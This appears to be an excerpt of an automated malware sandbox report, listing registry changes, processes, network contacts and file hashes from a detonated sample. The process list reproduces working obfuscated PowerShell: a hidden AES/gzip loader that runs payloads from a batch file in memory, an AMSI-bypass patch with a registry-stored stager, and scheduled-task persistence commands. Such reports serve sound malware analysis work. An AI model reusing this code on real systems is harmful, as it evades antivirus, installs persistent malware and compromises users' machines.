| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 50,1329 10,1329 15,1329 100,1329 6" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1716903831" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={5C975315-6E6E-4678-90C6-041CE3BF21B9}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
C:\Windows\system32\dwm.exe
"dwm.exe"
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s nsi
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s EventSystem
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s Dnscache
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s netprofm
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s StateRepository
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
c:\windows\system32\sihost.exe
sihost.exe
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
c:\windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s TokenBroker
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s CDPSvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\ApplicationFrameHost.exe
C:\Windows\system32\ApplicationFrameHost.exe -Embedding
C:\Windows\System32\InstallAgent.exe
C:\Windows\System32\InstallAgent.exe -Embedding
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\New1.bat"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('F+5wamWtVzd3aK2bnS7nWh4XV0PZc2pVZ9YG0yRK5cI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lnHVCKXb70Ny+fnCAwMhpw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $fLkgt=New-Object System.IO.MemoryStream(,$param_var); $wtCVF=New-Object System.IO.MemoryStream; $XRlUB=New-Object System.IO.Compression.GZipStream($fLkgt, [IO.Compression.CompressionMode]::Decompress); $XRlUB.CopyTo($wtCVF); $XRlUB.Dispose(); $fLkgt.Dispose(); $wtCVF.Dispose(); $wtCVF.ToArray();}function execute_function($param_var,$param2_var){ $PEWwL=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $iVLBa=$PEWwL.EntryPoint; $iVLBa.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\New1.bat';$OJTBF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\New1.bat').Split([Environment]::NewLine);foreach ($Wvrxg in $OJTBF) { if ($Wvrxg.StartsWith(':: ')) { $TvDjF=$Wvrxg.Substring(3); break; }}$payloads_var=[string[]]$TvDjF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_80_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_80.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Windows\sysWOW64\wbem\wmiprvse.exe
C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_80.vbs"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_80.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('F+5wamWtVzd3aK2bnS7nWh4XV0PZc2pVZ9YG0yRK5cI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lnHVCKXb70Ny+fnCAwMhpw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $fLkgt=New-Object System.IO.MemoryStream(,$param_var); $wtCVF=New-Object System.IO.MemoryStream; $XRlUB=New-Object System.IO.Compression.GZipStream($fLkgt, [IO.Compression.CompressionMode]::Decompress); $XRlUB.CopyTo($wtCVF); $XRlUB.Dispose(); $fLkgt.Dispose(); $wtCVF.Dispose(); $wtCVF.ToArray();}function execute_function($param_var,$param2_var){ $PEWwL=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $iVLBa=$PEWwL.EntryPoint; $iVLBa.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_80.bat';$OJTBF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_80.bat').Split([Environment]::NewLine);foreach ($Wvrxg in $OJTBF) { if ($Wvrxg.StartsWith(':: ')) { $TvDjF=$Wvrxg.Substring(3); break; }}$payloads_var=[string[]]$TvDjF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
C:\Users\Admin\AppData\Local\Temp\New.exe
"C:\Users\Admin\AppData\Local\Temp\New.exe"
C:\Users\Admin\AppData\Local\Temp\Install.exe
"C:\Users\Admin\AppData\Local\Temp\Install.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:llKRvSZMllYW{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$MyHGrZCzLVvveu,[Parameter(Position=1)][Type]$hUFPmYcTkO)$fpDSKjXfiQH=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+[Char](102)+''+'l'+''+[Char](101)+'c'+[Char](116)+''+[Char](101)+'d'+[Char](68)+'e'+'l'+''+[Char](101)+''+'g'+''+'a'+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+''+[Char](101)+''+'m'+''+[Char](111)+''+'r'+''+[Char](121)+'M'+[Char](111)+'d'+'u'+''+[Char](108)+''+'e'+'',$False).DefineType('My'+'D'+''+[Char](101)+''+[Char](108)+'e'+'g'+''+[Char](97)+''+'t'+''+[Char](101)+''+[Char](84)+'y'+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+'u'+''+'b'+''+'l'+''+[Char](105)+''+[Char](99)+''+','+'S'+[Char](101)+'a'+[Char](108)+''+[Char](101)+''+[Char](100)+','+[Char](65)+''+[Char](110)+''+'s'+'i'+[Char](67)+''+'l'+''+[Char](97)+''+'s'+''+'s'+''+[Char](44)+'A'+'u'+''+[Char](116)+''+[Char](111)+'Cl'+[Char](97)+''+[Char](115)+'s',[MulticastDelegate]);$fpDSKjXfiQH.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+'p'+'ec'+[Char](105)+''+[Char](97)+''+'l'+'Na'+[Char](109)+''+'e'+''+[Char](44)+''+[Char](72)+'i'+[Char](100)+''+'e'+''+'B'+''+[Char](121)+''+'S'+''+[Char](105)+''+[Char](103)+',P'+[Char](117)+''+[Char](98)+''+'l'+''+'i'+'c',[Reflection.CallingConventions]::Standard,$MyHGrZCzLVvveu).SetImplementationFlags(''+'R'+''+'u'+''+[Char](110)+''+[Char](116)+'ime,Mana'+[Char](103)+'ed');$fpDSKjXfiQH.DefineMethod('I'+[Char](110)+''+[Char](118)+''+'o'+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+'ic'+[Char](44)+'H'+[Char](105)+''+[Char](100)+'e'+'B'+''+'y'+'Si'+'g'+''+[Char](44)+''+[Char](78)+'e'+[Char](119)+'Sl'+[Char](111)+''+[Char](116)+''+','+''+[Char](86)+'ir'+[Char](116)+''+'u'+'a'+[Char](108)+'',$hUFPmYcTkO,$MyHGrZCzLVvveu).SetImplementationFlags(''+[Char](82)+'u'+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $fpDSKjXfiQH.CreateType();}$dncjQUcGxJIWl=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+'t'+[Char](101)+''+'m'+''+[Char](46)+''+'d'+'ll')}).GetType('M'+[Char](105)+''+'c'+'r'+[Char](111)+'s'+[Char](111)+''+[Char](102)+''+'t'+''+[Char](46)+'W'+[Char](105)+''+[Char](110)+''+'3'+'2.U'+[Char](110)+''+'s'+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+[Char](78)+''+[Char](97)+'t'+[Char](105)+'v'+[Char](101)+''+[Char](77)+''+'e'+''+[Char](116)+''+[Char](104)+''+'o'+''+'d'+''+[Char](115)+'');$xrFLYAdtQlnhiK=$dncjQUcGxJIWl.GetMethod(''+[Char](71)+''+'e'+''+'t'+''+[Char](80)+'r'+'o'+''+[Char](99)+''+[Char](65)+''+[Char](100)+''+[Char](100)+''+'r'+''+[Char](101)+'s'+'s'+'',[Reflection.BindingFlags](''+'P'+''+'u'+''+'b'+''+[Char](108)+''+[Char](105)+''+'c'+','+[Char](83)+''+'t'+''+[Char](97)+''+[Char](116)+''+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$lbTKnVbgmaRQkYuBXkv=llKRvSZMllYW @([String])([IntPtr]);$uAkNTsgbHvdGMnhilDCjwF=llKRvSZMllYW @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$HQDHcWrrWZP=$dncjQUcGxJIWl.GetMethod(''+[Char](71)+'e'+[Char](116)+'Mo'+'d'+''+[Char](117)+''+[Char](108)+'eHa'+'n'+''+'d'+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+'e'+[Char](114)+''+[Char](110)+'e'+[Char](108)+''+[Char](51)+''+[Char](50)+''+'.'+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$HWSOotrTsxxFpR=$xrFLYAdtQlnhiK.Invoke($Null,@([Object]$HQDHcWrrWZP,[Object](''+'L'+''+'o'+''+[Char](97)+'d'+'L'+''+'i'+''+[Char](98)+''+[Char](114)+''+[Char](97)+''+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$jsPXUeZOBRDOzLaWS=$xrFLYAdtQlnhiK.Invoke($Null,@([Object]$HQDHcWrrWZP,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+'tu'+'a'+''+'l'+''+'P'+'r'+[Char](111)+''+[Char](116)+''+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$BgTFYXp=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($HWSOotrTsxxFpR,$lbTKnVbgmaRQkYuBXkv).Invoke(''+[Char](97)+'m'+[Char](115)+''+[Char](105)+''+'.'+'d'+[Char](108)+''+[Char](108)+'');$ezApSscxgXTuikWSS=$xrFLYAdtQlnhiK.Invoke($Null,@([Object]$BgTFYXp,[Object](''+[Char](65)+'m'+[Char](115)+'iSc'+'a'+''+'n'+''+[Char](66)+''+[Char](117)+'f'+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$kRCWvciZRy=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($jsPXUeZOBRDOzLaWS,$uAkNTsgbHvdGMnhilDCjwF).Invoke($ezApSscxgXTuikWSS,[uint32]8,4,[ref]$kRCWvciZRy);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$ezApSscxgXTuikWSS,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($jsPXUeZOBRDOzLaWS,$uAkNTsgbHvdGMnhilDCjwF).Invoke($ezApSscxgXTuikWSS,[uint32]8,0x20,[ref]$kRCWvciZRy);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+[Char](84)+''+[Char](87)+'ARE').GetValue(''+[Char](36)+''+[Char](55)+''+[Char](55)+''+'s'+''+'t'+'a'+'g'+''+'e'+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\SysWOW64\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77New.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\New.exe'" /sc onlogon /rl HIGHEST
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{6c83b817-91fc-4304-bb0c-00cbd03f8f78}
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | runderscore00-25501.portmap.host | udp |
| DE | 193.161.193.99:25501 | runderscore00-25501.portmap.host | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.193.161.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.140.123.92.in-addr.arpa | udp |
Files
memory/752-2-0x000000007315E000-0x000000007315F000-memory.dmp
memory/752-3-0x0000000007170000-0x00000000071A6000-memory.dmp
memory/752-5-0x0000000073150000-0x000000007383E000-memory.dmp
memory/752-4-0x00000000077E0000-0x0000000007E08000-memory.dmp
memory/752-6-0x0000000007760000-0x0000000007782000-memory.dmp
memory/752-9-0x0000000073150000-0x000000007383E000-memory.dmp
memory/752-8-0x0000000008190000-0x00000000081F6000-memory.dmp
memory/752-7-0x0000000007F40000-0x0000000007FA6000-memory.dmp
memory/752-10-0x0000000008200000-0x0000000008550000-memory.dmp
memory/752-13-0x0000000008000000-0x000000000801C000-memory.dmp
memory/752-14-0x0000000008B10000-0x0000000008B5B000-memory.dmp
memory/752-15-0x0000000008870000-0x00000000088E6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uaca0e0v.naw.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/752-26-0x0000000073150000-0x000000007383E000-memory.dmp
memory/752-32-0x00000000096A0000-0x00000000096BA000-memory.dmp
memory/752-31-0x000000000AF70000-0x000000000B5E8000-memory.dmp
memory/752-33-0x0000000009670000-0x0000000009678000-memory.dmp
memory/752-34-0x000000000A970000-0x000000000AA62000-memory.dmp
memory/752-35-0x000000000D5F0000-0x000000000DAEE000-memory.dmp
memory/4460-45-0x0000000073150000-0x000000007383E000-memory.dmp
memory/4460-46-0x0000000073150000-0x000000007383E000-memory.dmp
memory/4460-47-0x0000000073150000-0x000000007383E000-memory.dmp
memory/4460-64-0x0000000009A60000-0x0000000009A93000-memory.dmp
memory/4460-66-0x0000000009A40000-0x0000000009A5E000-memory.dmp
memory/4460-67-0x0000000073150000-0x000000007383E000-memory.dmp
memory/4460-65-0x000000006FD30000-0x000000006FD7B000-memory.dmp
memory/4460-72-0x0000000009BE0000-0x0000000009C85000-memory.dmp
memory/4460-73-0x0000000073150000-0x000000007383E000-memory.dmp
memory/4460-74-0x0000000009D90000-0x0000000009E24000-memory.dmp
memory/4460-159-0x0000000073150000-0x000000007383E000-memory.dmp
memory/4460-167-0x0000000073150000-0x000000007383E000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 19a55e60e121a540fc521e9f678a85d9 |
| SHA1 | 82249ad9c017d256b3c15efb89eb7fa79148e663 |
| SHA256 | 9fca5871afcefc9a4eecca771046d20b8acc897f37f21fe62beafe5e3b186715 |
| SHA512 | 29c28f7357670ffc047be50630b460f0504aba7cc628a30826d2a601d1622af3a757c79c59276072cf61ac877fca516e66720cfd433911dee6ec596816c7716b |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | ac3d19fbb5c5f10833f1882308f77548 |
| SHA1 | ac880466fd99a5719fedc7289b00d78ba7088e06 |
| SHA256 | 3353b90af649198e084632af776f8c6ea3a9302da5a50d85f7ecde1c7ad295df |
| SHA512 | b5e6369d7f475e9931d19fb2a5305b4c901ca5fcac5d788d064b6a1b1d6de2034e84932ac243d5056c745b924a2e9537a06b4172fab364402263788c814bc28b |
C:\Users\Admin\AppData\Roaming\startup_str_80.vbs
| MD5 | ed6727914bd82e63738b7a4baecf0b48 |
| SHA1 | 657c99505d822abb6de7108cb7ab51bfbf38fbb7 |
| SHA256 | 7c431d1125251cb53943087030e0e65bc471ab22189f76acd1c777d1de1a3e93 |
